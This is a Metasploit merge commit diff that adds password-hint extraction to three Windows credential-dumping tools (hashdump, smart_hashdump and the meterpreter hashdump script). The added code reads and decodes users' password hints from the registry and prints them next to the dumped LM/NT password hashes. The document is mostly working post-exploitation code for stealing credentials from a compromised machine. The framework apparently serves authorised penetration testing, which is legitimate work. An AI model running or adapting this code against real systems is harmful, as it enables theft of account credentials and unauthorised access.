Merge branch 'claudijd-master'

2012-08-21 14:19:45 -05:00 · 2012-08-21 14:19:45 -05:00 · 20b3dfca9f
parent 73eab8a8ee 433c9f6b28
commit 20b3dfca9f
3 changed files with 127 additions and 3 deletions
--- a/modules/post/windows/gather/hashdump.rb
+++ b/modules/post/windows/gather/hashdump.rb
@ -74,6 +74,19 @@ class Metasploit3 < Msf::Post
 			print_status("Decrypting user keys...")
 			users    = decrypt_user_keys(hbootkey, users)

+			print_status("Dumping password hints...")
+			print_line()
+			hint_count = 0
+			users.keys.sort{|a,b| a<=>b}.each do |rid|
+				#If we have a hint then print it
+				if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+					print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
+					hint_count += 1
+				end
+			end
+			print_line "No users with password hints on this system" if hint_count == 0
+			print_line()
+
 			print_status("Dumping password hashes...")
 			print_line()
 			print_line()
@ -87,6 +100,7 @@ class Metasploit3 < Msf::Post
 					:pass  => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
 					:type  => "smb_hash"
 				)
+
 				print_line hashstring
 			end
 			print_line()
@ -164,6 +178,14 @@ class Metasploit3 < Msf::Post
 			users[usr.to_i(16)] ||={}
 			users[usr.to_i(16)][:F] = uk.query_value("F").data
 			users[usr.to_i(16)][:V] = uk.query_value("V").data
+
+			#Attempt to get Hints (from Win7/Win8 Location)
+			begin
+				users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
+			rescue ::Rex::Post::Meterpreter::RequestError
+				users[usr.to_i(16)][:UserPasswordHint] = nil
+			end
+
 			uk.close
 		end
 		ok.close
@ -175,6 +197,17 @@ class Metasploit3 < Msf::Post
 			rid = r.type
 			users[rid] ||= {}
 			users[rid][:Name] = usr
+
+			#Attempt to get Hints (from WinXP Location) only if it's not set yet
+			if users[rid][:UserPasswordHint].nil?
+				begin
+					uk_hint = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+					users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+				rescue ::Rex::Post::Meterpreter::RequestError
+					users[rid][:UserPasswordHint] = nil
+				end
+			end
+
 			uk.close
 		end
 		ok.close
@ -205,6 +238,15 @@ class Metasploit3 < Msf::Post
 		users
 	end

+	def decode_windows_hint(e_string)
+		d_string = ""
+		e_string.scan(/..../).each do |chunk|
+			bytes = chunk.scan(/../)
+			d_string += (bytes[1] + bytes[0]).to_s.hex.chr
+		end
+		d_string
+	end
+
 	def convert_des_56_to_64(kstr)
 		key = []
 		str = kstr.unpack("C*")
--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@ -140,6 +140,14 @@ class Metasploit3 < Msf::Post
 			users[usr.to_i(16)] ||={}
 			users[usr.to_i(16)][:F] = uk.query_value("F").data
 			users[usr.to_i(16)][:V] = uk.query_value("V").data
+
+			#Attempt to get Hints (from Win7/Win8 Location)
+			begin
+				users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
+			rescue ::Rex::Post::Meterpreter::RequestError
+				users[usr.to_i(16)][:UserPasswordHint] = nil
+			end
+
 			uk.close
 		end
 		ok.close
@ -151,6 +159,17 @@ class Metasploit3 < Msf::Post
 			rid = r.type
 			users[rid] ||= {}
 			users[rid][:Name] = usr
+
+			#Attempt to get Hints (from WinXP Location) only if it's not set yet
+			if users[rid][:UserPasswordHint].nil?
+				begin
+					uk_hint = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+					users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+				rescue ::Rex::Post::Meterpreter::RequestError
+					users[rid][:UserPasswordHint] = nil
+				end
+			end
+
 			uk.close
 		end
 		ok.close
@ -183,6 +202,16 @@ class Metasploit3 < Msf::Post
 	end
 	#-------------------------------------------------------------------------------

+	def decode_windows_hint(e_string)
+		d_string = ""
+		e_string.scan(/..../).each do |chunk|
+			bytes = chunk.scan(/../)
+			d_string += (bytes[1] + bytes[0]).to_s.hex.chr
+		end
+		d_string
+	end
+	#-------------------------------------------------------------------------------
+
 	def convert_des_56_to_64(kstr)
 		key = []
 		str = kstr.unpack("C*")
@ -273,12 +302,23 @@ class Metasploit3 < Msf::Post
 			print_status("\tDecrypting user keys...")
 			users    = decrypt_user_keys(hbootkey, users)

-			print_status("\tDumping password hashes...")
+			print_status("\tDumping password hints...")
+			hint_count = 0
+			users.keys.sort{|a,b| a<=>b}.each do |rid|
+				#If we have a hint then print it
+				if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+					print_good("\t#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\"")
+					hint_count += 1
+				end
+			end
+			print_status("\tNo users with password hints on this system") if hint_count == 0

+			print_status("\tDumping password hashes...")
 			users.keys.sort{|a,b| a<=>b}.each do |rid|
 				# next if guest account or support account
 				next if rid == 501 or rid == 1001
 				collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
+
 				print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
 				session.framework.db.report_auth_info(
 					:host  => host,
@ -290,7 +330,6 @@ class Metasploit3 < Msf::Post
 				)
 			end

-
 		rescue ::Interrupt
 			raise $!
 		rescue ::Rex::Post::Meterpreter::RequestError => e
--- a/scripts/meterpreter/hashdump.rb
+++ b/scripts/meterpreter/hashdump.rb
@ -101,6 +101,14 @@ def capture_user_keys
 		users[usr.to_i(16)] ||={}
 		users[usr.to_i(16)][:F] = uk.query_value("F").data
 		users[usr.to_i(16)][:V] = uk.query_value("V").data
+		
+		#Attempt to get Hints (from Win7/Win8 Location)
+		begin
+			users[usr.to_i(16)][:UserPasswordHint] = decode_windows_hint(uk.query_value("UserPasswordHint").data.unpack("H*")[0])
+		rescue ::Rex::Post::Meterpreter::RequestError
+			users[usr.to_i(16)][:UserPasswordHint] = nil
+		end
+		
 		uk.close
 	end
 	ok.close
@ -112,6 +120,17 @@ def capture_user_keys
 		rid = r.type
 		users[rid] ||= {}
 		users[rid][:Name] = usr
+		
+		#Attempt to get Hints (from WinXP Location) only if it's not set yet
+		if users[rid][:UserPasswordHint].nil?	
+			begin
+				uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+				users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+			rescue ::Rex::Post::Meterpreter::RequestError
+				users[rid][:UserPasswordHint] = nil
+			end
+		end
+		
 		uk.close
 	end
 	ok.close
@ -142,6 +161,15 @@ def decrypt_user_keys(hbootkey, users)
 	users
 end

+def decode_windows_hint(e_string)
+	d_string = ""
+	e_string.scan(/..../).each do |chunk|
+		bytes = chunk.scan(/../)
+		d_string += (bytes[1] + bytes[0]).to_s.hex.chr
+	end
+	d_string
+end
+
 def convert_des_56_to_64(kstr)
 	key = []
 	str = kstr.unpack("C*")
@ -226,6 +254,19 @@ if client.platform =~ /win32|win64/
 		print_status("Decrypting user keys...")
 		users    = decrypt_user_keys(hbootkey, users)

+		print_status("Dumping password hints...")
+		print_line()
+		hint_count = 0
+		users.keys.sort{|a,b| a<=>b}.each do |rid|
+			#If we have a hint then print it
+			if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+				print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
+				hint_count += 1
+			end	
+		end
+		print_line("No users with password hints on this system") if hint_count == 0 
+		print_line()
+
 		print_status("Dumping password hashes...")
 		print_line()
 		print_line()
@ -239,7 +280,9 @@ if client.platform =~ /win32|win64/
 				:pass  => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
 				:type  => "smb_hash"
 			)
+			
 			print_line hashstring
+			
 		end
 		print_line()
 		print_line()